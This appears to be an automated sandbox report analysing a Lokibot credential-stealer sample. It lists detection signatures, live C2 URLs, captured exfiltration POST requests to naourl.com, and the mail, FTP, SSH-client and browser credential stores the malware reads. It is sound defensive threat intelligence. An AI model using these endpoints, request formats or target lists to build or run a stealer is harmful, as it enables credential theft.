
Windows Analysis Report rfxJzZjiWv.exe

Overview

General Information

Sample Name: rfxJzZjiWv.exe
Analysis ID: 534005
MD5: 8ed7e6b478cf0c00934bb42e3bdf5e20
SHA1: ceb70c6dc5a85a64cc7a47e0ec12936f2d5e57db
SHA256: 4395224e257fe5659011fb90649c89d295e80123d7622d6cdb5b09371573e1aa
Tags: exe, Loki

Detection

Lokibot
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Antivirus / Scanner detection for submitted sample
Yara detected Lokibot
Multi AV Scanner detection for domain / URL
Tries to steal Mail credentials (via file / registry access)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Yara detected aPLib compressed binary
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file registry)
Machine Learning detection for sample
C2 URLs / IPs found in malware configuration
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Yara signature match
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Enables debug privileges
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged

Classification

Process Tree

  • System is w10x64
  • rfxJzZjiWv.exe (PID: 6644 cmdline: "C:\Users\user\Desktop\rfxJzZjiWv.exe" MD5: 8ED7E6B478CF0C00934BB42E3BDF5E20)
  • cleanup

Malware Configuration

Threatname: Lokibot

{"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php"]}

Yara Overview

Initial Sample

Source | Rule | Description | Author | Strings
rfxJzZjiWv.exe | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security | -
rfxJzZjiWv.exe | JoeSecurity_aPLib_compressed_binary | Yara detected aPLib compressed binary | Joe Security | -
rfxJzZjiWv.exe | JoeSecurity_Lokibot | Yara detected Lokibot | Joe Security | -
rfxJzZjiWv.exe | Loki_1 | Loki Payload | kevoreilly | listed below:
  • 0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW
  • 0x13ffc:$a2: last_compatible_version
rfxJzZjiWv.exe | Lokibot | detect Lokibot in memory | JPCERT/CC Incident Response Group | listed below:
  • 0x12fff:$des3: 68 03 66 00 00
  • 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X
  • 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00

Memory Dumps

Source | Rule | Description | Author | Strings
00000000.00000002.662501155.0000000000415000.00000002.00020000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security | -
00000000.00000002.662501155.0000000000415000.00000002.00020000.sdmp | JoeSecurity_aPLib_compressed_binary | Yara detected aPLib compressed binary | Joe Security | -
00000000.00000002.662501155.0000000000415000.00000002.00020000.sdmp | JoeSecurity_Lokibot | Yara detected Lokibot | Joe Security | -
00000000.00000000.645669374.0000000000415000.00000002.00020000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security | -
00000000.00000000.645669374.0000000000415000.00000002.00020000.sdmp | JoeSecurity_aPLib_compressed_binary | Yara detected aPLib compressed binary | Joe Security | -

Unpacked PEs

Source | Rule | Description | Author | Strings
0.0.rfxJzZjiWv.exe.400000.0.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security | -
0.0.rfxJzZjiWv.exe.400000.0.unpack | JoeSecurity_aPLib_compressed_binary | Yara detected aPLib compressed binary | Joe Security | -
0.0.rfxJzZjiWv.exe.400000.0.unpack | JoeSecurity_Lokibot | Yara detected Lokibot | Joe Security | -
0.0.rfxJzZjiWv.exe.400000.0.unpack | Loki_1 | Loki Payload | kevoreilly | listed below:
  • 0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW
  • 0x13ffc:$a2: last_compatible_version
0.0.rfxJzZjiWv.exe.400000.0.unpack | Lokibot | detect Lokibot in memory | JPCERT/CC Incident Response Group | listed below:
  • 0x12fff:$des3: 68 03 66 00 00
  • 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X
  • 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

AV Detection:

Found malware configuration
Source: 00000000.00000000.645669374.0000000000415000.00000002.00020000.sdmp; Malware Configuration Extractor: Lokibot {"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php"]}
Multi AV Scanner detection for submitted file
Source: rfxJzZjiWv.exe; Virustotal: Detection: 88%
Source: rfxJzZjiWv.exe; Metadefender: Detection: 88%
Source: rfxJzZjiWv.exe; ReversingLabs: Detection: 96%
Antivirus / Scanner detection for submitted sample
Source: rfxJzZjiWv.exe; Avira: detected
Multi AV Scanner detection for domain / URL
Source: naourl.com; Virustotal: Detection: 6%
Source: http://naourl.com/data/five/fre.php; Virustotal: Detection: 11%
Source: http://survey-smiles.com; Virustotal: Detection: 5%
Machine Learning detection for sample
Source: rfxJzZjiWv.exe; Joe Sandbox ML: detected
Source: rfxJzZjiWv.exe; Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
Source: C:\Users\user\Desktop\rfxJzZjiWv.exe; Code function: 0_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic; Snort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.4:49752 -> 212.32.237.90:80
Source: Traffic; Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49752 -> 212.32.237.90:80
Source: Traffic; Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49752 -> 212.32.237.90:80
Source: Traffic; Snort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.4:49752 -> 212.32.237.90:80
Source: Traffic; Snort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.4:49765 -> 212.32.237.90:80
Source: Traffic; Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49765 -> 212.32.237.90:80
Source: Traffic; Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49765 -> 212.32.237.90:80
Source: Traffic; Snort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.4:49765 -> 212.32.237.90:80
Source: Traffic; Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49766 -> 212.32.237.90:80
Source: Traffic; Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49766 -> 212.32.237.90:80
Source: Traffic; Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49766 -> 212.32.237.90:80
Source: Traffic; Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49766 -> 212.32.237.90:80
Source: Traffic; Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49767 -> 212.32.237.90:80
Source: Traffic; Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49767 -> 212.32.237.90:80
Source: Traffic; Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49767 -> 212.32.237.90:80
Source: Traffic; Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49767 -> 212.32.237.90:80
Source: Traffic; Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49768 -> 212.32.237.90:80
Source: Traffic; Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49768 -> 212.32.237.90:80
Source: Traffic; Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49768 -> 212.32.237.90:80
Source: Traffic; Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49768 -> 212.32.237.90:80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor; URLs: http://kbfvzoboss.bid/alien/fre.php
Source: Malware configuration extractor; URLs: http://alphastand.trade/alien/fre.php
Source: Malware configuration extractor; URLs: http://alphastand.win/alien/fre.php
Source: Malware configuration extractor; URLs: http://alphastand.top/alien/fre.php
Source: Joe Sandbox View; ASN Name: LEASEWEB-NL-AMS-01 Netherlands NL
Source: Joe Sandbox View; IP Address: 212.32.237.90
Source: global traffic; HTTP traffic detected: POST /data/five/fre.php HTTP/1.0 | User-Agent: Mozilla/4.08 (Charon; Inferno) | Host: naourl.com | Accept: */* | Content-Type: application/octet-stream | Content-Encoding: binary | Content-Key: 7B0651A2 | Content-Length: 190 | Connection: close
Source: global traffic; HTTP traffic detected: POST /data/five/fre.php HTTP/1.0 | User-Agent: Mozilla/4.08 (Charon; Inferno) | Host: naourl.com | Accept: */* | Content-Type: application/octet-stream | Content-Encoding: binary | Content-Key: 7B0651A2 | Content-Length: 163 | Connection: close
Source: rfxJzZjiWv.exe; String found in binary or memory: http://naourl.com/data/five/fre.php
Source: rfxJzZjiWv.exe, 00000000.00000002.662546536.0000000000751000.00000004.00000020.sdmp; String found in binary or memory: http://survey-smiles.com
Source: rfxJzZjiWv.exe; String found in binary or memory: http://www.ibsensoftware.com/
Source: unknown; HTTP traffic detected: POST /data/five/fre.php HTTP/1.0 | User-Agent: Mozilla/4.08 (Charon; Inferno) | Host: naourl.com | Accept: */* | Content-Type: application/octet-stream | Content-Encoding: binary | Content-Key: 7B0651A2 | Content-Length: 190 | Connection: close
Source: unknown; DNS traffic detected: queries for: naourl.com
Source: C:\Users\user\Desktop\rfxJzZjiWv.exe; Code function: 0_2_0040648B URLDownloadToFileW

System Summary:

Malicious sample detected (through community Yara rule)
Source: rfxJzZjiWv.exe, type: SAMPLE; Matched rule: Loki Payload; Author: kevoreilly
Source: rfxJzZjiWv.exe, type: SAMPLE; Matched rule: detect Lokibot in memory; Author: JPCERT/CC Incident Response Group
Source: 0.0.rfxJzZjiWv.exe.400000.0.unpack, type: UNPACKEDPE; Matched rule: Loki Payload; Author: kevoreilly
Source: 0.0.rfxJzZjiWv.exe.400000.0.unpack, type: UNPACKEDPE; Matched rule: detect Lokibot in memory; Author: JPCERT/CC Incident Response Group
Source: 0.2.rfxJzZjiWv.exe.400000.0.unpack, type: UNPACKEDPE; Matched rule: Loki Payload; Author: kevoreilly
Source: 0.2.rfxJzZjiWv.exe.400000.0.unpack, type: UNPACKEDPE; Matched rule: detect Lokibot in memory; Author: JPCERT/CC Incident Response Group
Source: rfxJzZjiWv.exe; Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
Source: rfxJzZjiWv.exe, type: SAMPLE; Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: rfxJzZjiWv.exe, type: SAMPLE; Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 0.0.rfxJzZjiWv.exe.400000.0.unpack, type: UNPACKEDPE; Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 0.0.rfxJzZjiWv.exe.400000.0.unpack, type: UNPACKEDPE; Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.rfxJzZjiWv.exe.400000.0.unpack, type: UNPACKEDPE; Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
Source: 0.2.rfxJzZjiWv.exe.400000.0.unpack, type: UNPACKEDPE; Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 0.2.rfxJzZjiWv.exe.400000.0.unpack, type: UNPACKEDPE; Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: C:\Users\user\Desktop\rfxJzZjiWv.exe; Code function: 0_2_0040549C
Source: C:\Users\user\Desktop\rfxJzZjiWv.exe; Code function: 0_2_004029D4
Source: C:\Users\user\Desktop\rfxJzZjiWv.exe; Code function: String function: 0041219C appears 45 times
Source: C:\Users\user\Desktop\rfxJzZjiWv.exe; Code function: String function: 00405B6F appears 41 times
Source: rfxJzZjiWv.exe; Virustotal: Detection: 88%
Source: rfxJzZjiWv.exe; Metadefender: Detection: 88%
Source: rfxJzZjiWv.exe; ReversingLabs: Detection: 96%
Source: rfxJzZjiWv.exe; Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\rfxJzZjiWv.exe; Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\Desktop\rfxJzZjiWv.exe; Code function: 0_2_0040650A LookupPrivilegeValueW,AdjustTokenPrivileges
Source: C:\Users\user\Desktop\rfxJzZjiWv.exe; File created: C:\Users\user\AppData\Roaming\Microsoft\Crypto
Source: classification engine; Classification label: mal100.troj.spyw.evad.winEXE@1/2@5/2
Source: C:\Users\user\Desktop\rfxJzZjiWv.exe; Code function: 0_2_0040434D CoInitialize,CoCreateInstance,VariantInit,SysAllocString,VariantInit,VariantInit,SysAllocString,VariantInit,SysFreeString,SysFreeString,CoUninitialize
Source: C:\Users\user\Desktop\rfxJzZjiWv.exe; Mutant created: \Sessions\1\BaseNamedObjects\8F9C4E9C79A3B52B3F739430
Source: C:\Users\user\Desktop\rfxJzZjiWv.exe; File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\Desktop\rfxJzZjiWv.exe; Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook

Data Obfuscation:

Yara detected aPLib compressed binary
Source: Yara match; File source: rfxJzZjiWv.exe, type: SAMPLE
Source: Yara match; File source: 0.0.rfxJzZjiWv.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.rfxJzZjiWv.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 00000000.00000002.662501155.0000000000415000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match; File source: 00000000.00000000.645669374.0000000000415000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match; File source: Process Memory Space: rfxJzZjiWv.exe PID: 6644, type: MEMORYSTR
Source: C:\Users\user\Desktop\rfxJzZjiWv.exe; Code function: 0_2_00402AC0 push eax; ret 0_2_00402AD4
Source: C:\Users\user\Desktop\rfxJzZjiWv.exe; Code function: 0_2_00402AC0 push eax; ret 0_2_00402AFC
Source: rfxJzZjiWv.exe; Static PE information: section name: .x
Source: C:\Users\user\Desktop\rfxJzZjiWv.exe; Process information set: NOGPFAULTERRORBOX
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exe | TID: 6672 | Thread sleep time: -60000s >= -30000s
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exe | Last function: Thread delayed
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exe | Code function: 0_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exe | Thread delayed: delay time: 60000
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exe | Code function: 0_2_00402B7C GetProcessHeap,RtlAllocateHeap
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exe | Process token adjusted: Debug
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exe | Code function: 0_2_0040317B mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exe | Process queried: DebugPort
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exe | Code function: 0_2_00406069 GetUserNameW

                        Stealing of Sensitive Information:

                        Yara detected Lokibot
                        Source: Yara match | File source: rfxJzZjiWv.exe, type: SAMPLE
                        Source: Yara match | File source: 0.0.rfxJzZjiWv.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 0.2.rfxJzZjiWv.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 00000000.00000002.662501155.0000000000415000.00000002.00020000.sdmp, type: MEMORY
                        Source: Yara match | File source: 00000000.00000000.645669374.0000000000415000.00000002.00020000.sdmp, type: MEMORY
                        Source: Yara match | File source: Process Memory Space: rfxJzZjiWv.exe PID: 6644, type: MEMORYSTR
                        Tries to steal Mail credentials (via file / registry access)
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exe | Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
                        Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exe | Key opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\Sessions
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exe | Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl
                        Tries to harvest and steal ftp login credentials
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exe | File opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exe | File opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccounts
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exe | File opened: HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\Settings
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exe | File opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts
                        Tries to steal Mail credentials (via file registry)
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exe | Code function: PopPassword 0_2_0040D069
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exe | Code function: SmtpPassword 0_2_0040D069
                        Tries to harvest and steal browser information (history, passwords, etc)
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                        Source: Yara match | File source: rfxJzZjiWv.exe, type: SAMPLE
                        Source: Yara match | File source: 0.0.rfxJzZjiWv.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 0.2.rfxJzZjiWv.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 00000000.00000002.662501155.0000000000415000.00000002.00020000.sdmp, type: MEMORY
                        Source: Yara match | File source: 00000000.00000000.645669374.0000000000415000.00000002.00020000.sdmp, type: MEMORY

                        Mitre Att&ck Matrix

                        Techniques listed per tactic column; figures in parentheses are the report's per-technique signature counts.
                        Initial Access: Valid Accounts, Default Accounts, Domain Accounts, Local Accounts, Cloud Accounts, Replication Through Removable Media, External Remote Services
                        Execution: Windows Management Instrumentation, Scheduled Task/Job, At (Linux), At (Windows), Cron, Launchd, Scheduled Task
                        Persistence: Path Interception, Boot or Logon Initialization Scripts, Logon Script (Windows), Logon Script (Mac), Network Logon Script, Rc.common, Startup Items
                        Privilege Escalation: Access Token Manipulation (1), Boot or Logon Initialization Scripts, Logon Script (Windows), Logon Script (Mac), Network Logon Script, Rc.common, Startup Items
                        Defense Evasion: Masquerading (1), Virtualization/Sandbox Evasion (21), Access Token Manipulation (1), Deobfuscate/Decode Files or Information (1), Obfuscated Files or Information (2), Steganography, Compile After Delivery
                        Credential Access: OS Credential Dumping (2), Credentials in Registry (2), Security Account Manager, NTDS, LSA Secrets, Cached Domain Credentials, DCSync
                        Discovery: Security Software Discovery (2), Virtualization/Sandbox Evasion (21), Account Discovery (1), System Owner/User Discovery (1), Remote System Discovery (1), File and Directory Discovery (1), System Information Discovery (3)
                        Lateral Movement: Remote Services, Remote Desktop Protocol, SMB/Windows Admin Shares, Distributed Component Object Model, SSH, VNC, Windows Remote Management
                        Collection: Email Collection (1), Archive Collected Data (1), Data from Local System (2), Input Capture, Keylogging, GUI Input Capture, Web Portal Capture
                        Exfiltration: Exfiltration Over Other Network Medium, Exfiltration Over Bluetooth, Automated Exfiltration, Scheduled Transfer, Data Transfer Size Limits, Exfiltration Over C2 Channel, Exfiltration Over Alternative Protocol
                        Command and Control: Encrypted Channel (1), Ingress Tool Transfer (1), Non-Application Layer Protocol (2), Application Layer Protocol (112), Fallback Channels, Multiband Communication, Commonly Used Port
                        Network Effects: Eavesdrop on Insecure Network Communication, Exploit SS7 to Redirect Phone Calls/SMS, Exploit SS7 to Track Device Location, SIM Card Swap, Manipulate Device Communication, Jamming or Denial of Service, Rogue Wi-Fi Access Points
                        Remote Service Effects: Remotely Track Device Without Authorization, Remotely Wipe Data Without Authorization, Obtain Device Cloud Backups
                        Impact: Modify System Partition, Device Lockout, Delete Device Data, Carrier Billing Fraud, Manipulate App Store Rankings or Ratings, Abuse Accessibility Features, Data Encrypted for Impact

                        Behavior Graph

                        Screenshots


                        Antivirus, Machine Learning and Genetic Malware Detection

                        Initial Sample

                        Source | Detection | Scanner | Label
                        rfxJzZjiWv.exe | 88% | Virustotal |
                        rfxJzZjiWv.exe | 88% | Metadefender |
                        rfxJzZjiWv.exe | 96% | ReversingLabs | Win32.Trojan.LokiBot
                        rfxJzZjiWv.exe | 100% | Avira | TR/Crypt.XPACK.Gen
                        rfxJzZjiWv.exe | 100% | Joe Sandbox ML |

                        Dropped Files

                        No Antivirus matches

                        Unpacked PE Files

                        Source | Detection | Scanner | Label
                        0.0.rfxJzZjiWv.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
                        0.2.rfxJzZjiWv.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen

                        Domains

                        Source | Detection | Scanner | Label
                        naourl.com | 6% | Virustotal |

                        URLs

                        Source | Detection | Scanner | Label
                        http://kbfvzoboss.bid/alien/fre.php | 0% | URL Reputation | safe
                        http://alphastand.win/alien/fre.php | 0% | URL Reputation | safe
                        http://naourl.com/data/five/fre.php | 11% | Virustotal |
                        http://naourl.com/data/five/fre.php | 0% | Avira URL Cloud | safe
                        http://alphastand.trade/alien/fre.php | 0% | URL Reputation | safe
                        http://alphastand.top/alien/fre.php | 0% | URL Reputation | safe
                        http://www.ibsensoftware.com/ | 0% | URL Reputation | safe
                        http://survey-smiles.com | 5% | Virustotal |
                        http://survey-smiles.com | 0% | Avira URL Cloud | safe

                        Domains and IPs

                        Contacted Domains

                        Name | IP | Active | Malicious | Antivirus Detection | Reputation
                        naourl.com | 212.32.237.90 | true | true | | unknown

                        Contacted URLs

                        Name | Malicious | Antivirus Detection | Reputation
                        http://kbfvzoboss.bid/alien/fre.php | true | URL Reputation: safe | unknown
                        http://alphastand.win/alien/fre.php | true | URL Reputation: safe | unknown
                        http://naourl.com/data/five/fre.php | true | 11%, Virustotal; Avira URL Cloud: safe | unknown
                        http://alphastand.trade/alien/fre.php | true | URL Reputation: safe | unknown
                        http://alphastand.top/alien/fre.php | true | URL Reputation: safe | unknown

                        URLs from Memory and Binaries

                        Name | Source | Malicious | Antivirus Detection | Reputation
                        http://www.ibsensoftware.com/ | rfxJzZjiWv.exe | false | URL Reputation: safe | unknown
                        http://survey-smiles.com | rfxJzZjiWv.exe, 00000000.00000002.662546536.0000000000751000.00000004.00000020.sdmp | false | 5%, Virustotal; Avira URL Cloud: safe | unknown

                        Contacted IPs


                        Public

                        IP | Domain | Country | ASN | ASN Name | Malicious
                        212.32.237.90 | naourl.com | Netherlands | 60781 | LEASEWEB-NL-AMS-01, Netherlands, NL | true

                        Private

                        IP
                        192.168.2.1

                        General Information

                        Joe Sandbox Version:34.0.0 Boulder Opal
                        Analysis ID:534005
                        Start date:04.12.2021
                        Start time:23:39:35
                        Joe Sandbox Product:CloudBasic
                        Overall analysis duration:0h 2m 44s
                        Hypervisor based Inspection enabled:false
                        Report type:full
                        Sample file name:rfxJzZjiWv.exe
                        Cookbook file name:default.jbs
                        Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                        Number of analysed new started processes analysed:5
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:0
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • HDC enabled
                        • AMSI enabled
                        Analysis Mode:default
                        Analysis stop reason:Timeout
                        Detection:MAL
                        Classification:mal100.troj.spyw.evad.winEXE@1/2@5/2
                        EGA Information:Failed
                        HDC Information:
                        • Successful, ratio: 100% (good quality ratio 95.9%)
                        • Quality average: 77%
                        • Quality standard deviation: 28.6%
                        HCA Information:Failed
                        Cookbook Comments:
                        • Adjust boot time
                        • Enable AMSI
                        • Found application associated with file extension: .exe
                        • Stop behavior analysis, all processes terminated
                        Warnings:
                        • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe
                        • Excluded IPs from analysis (whitelisted): 20.82.209.183
                        • Excluded domains from analysis (whitelisted): iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, store-images.s-microsoft.com, arc.trafficmanager.net, arc.msn.com
                        • Report size getting too big, too many NtQueryValueKey calls found.

                        Simulations

                        Behavior and APIs

                        Time | Type | Description
                        23:40:27 | API Interceptor | 3x Sleep call for process: rfxJzZjiWv.exe modified

                        Joe Sandbox View / Context

                        IPs

                        Match: 212.32.237.90
                        Associated Sample Name / URL | Detection | Context
                        PVCbiDUqly50DqS.exe | malicious | www.lendisty.com/n3kw/?XBZ4Xz=3e7Yc+NXVXGadH5y5BNj3Y3Se2h8oiNm35D3uKayWhE9KadvN5yxkmKGsLBu645DSWG9&5jJtSj=uXStFZp8ar
                        Fatura - Ex#35175382.pdf.exe | malicious | www.mwal.art/mabs/?jX8=3fQLnD&s0=y5mht5ETURUFzQSCIUXjodTlI+2TrsvqVBKlsua0zkPwCIYtRvvnPuF29Yxp6gBGwBsBQjQVNQ==
                        1lHMXoDyPa.exe | malicious | www.thetravellingwitch.com/wufn/?jrDHJt=SkZZDimXYK2GAldHwXdupEC24fazy/RNnOtrI6tDOvPCvzBdUVr3zvvTsRlAE2ql+mXxxlQZWg==&fR-=_JE8XJdXJfIL8n7
                        UJ8y5QToVc.exe | malicious | www.stearmanestates.com/ixwn/?W6AlL=PkY2LXPJp6HaPUrgGBEF3fMC5B3U3PtoZvpjUGm/uozF9Gfrzlf5sS41ov77FP8zbsbQ&-ZS8=9rJ0dRNxBdO0ALQp
                        OoBepaLH3W.exe | malicious | www.ololmychartlogin.com/p2io/?brMXBhD=2q6D4S4IYN7aWdcEo+dmfNOnFlWkohYFDzpy6Q1cDMIvB7dycn+zvuYm9Ot1G4m5E5eG&axl4i=0d9HO65X_T8H0F
                        bin.exe | malicious | www.futeboplayhd.com/cvrn/?9rSx00op=cI6gjmZKBv9uYsypK0vTgXjIez8bgYte2jg17UPI8uiUbtEGnMVqV/X2US4uhWYMbwpwMQFc9A==&StT=FR-8dxEhSB
                        F63V4i8eZU.exe | malicious | www.tearor.com/nff/?D48p=4F7AytNRxG9Okht4XRBjCmtmhOo761MGK9UHRz2K68ko8sG2VRn93GfHKNzVTrlp6vls&-ZgX=tR-DSFa8o
                        invoice.exe | malicious | www.bradforrexchange.com/3edq/?l6L0N=jO6sWaazfWUScqk/UMZ2V9vSXHj7s0GXSNY0VsmNmZeYB4f0QdniyMTma+6l76TklIvb&0BIX=M8Fp-rt
                        IsIMH5zplo.exe | malicious | www.ololmychartlogin.com/p2io/?n2MLF0Ux=2q6D4S4IYN7aWdcEo+dmfNOnFlWkohYFDzpy6Q1cDMIvB7dycn+zvuYm9Ot1G4m5E5eG&Dj6t=CpStsPY
                        USU(1).exe | malicious | www.bravefctv.com/zrmt/?P0G=EjUHInR&9r7T-=qIu/umqcIRyioTP+pvG+OWyvgre6YRhQlm6oiia3xqVFZWqPiKKv9qZBiAyUvYT1LHAt
